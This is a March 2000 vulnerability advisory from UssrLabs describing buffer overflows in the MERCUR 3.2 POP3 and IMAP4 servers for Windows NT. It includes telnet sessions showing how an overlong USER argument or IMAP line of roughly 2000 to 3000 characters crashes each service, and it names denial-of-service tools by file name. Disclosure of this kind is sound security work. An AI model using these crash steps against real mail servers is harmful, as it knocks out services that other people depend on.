Local / Remote Multiples DoS Attacks in MERCUR v3.2* Vulnerability

   

MERCUR

MERCUR v3.2 DoS Attacks

Binary POP3 DOS

Domrc32p.exe

Binary IMAP DOS

Domrc32i.exe

Source of Binary DOS

merc32ds.zip


USSR Advisory Code:   USSR-2000035


Release Date:
March 15, 2000


Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT
MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT


THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where they do not use proper bounds checking.
The following all result in a Denial of Service against the service in question.


Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.

+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 M
ar 2000  03:30:39 -0300
user (buffer)


Where [buffer] is  aprox. 2000 characters.


[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14
 Mar 2000  03:34:09 -0300  

(buffer)


Where [buffer] is aprox. 3000 characters.


Exploit: 
the Exploit, crash the remote machine service pop3 and imap


Vendor Status:
informed


Vendor   Url: http://www.atrium-software.com
Program  Url: http://www.atrium-software.com/mercur/mercur_e.html


Credit: USSRLABS


SOLUTION:

Noting yet.


Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and Wiretrip.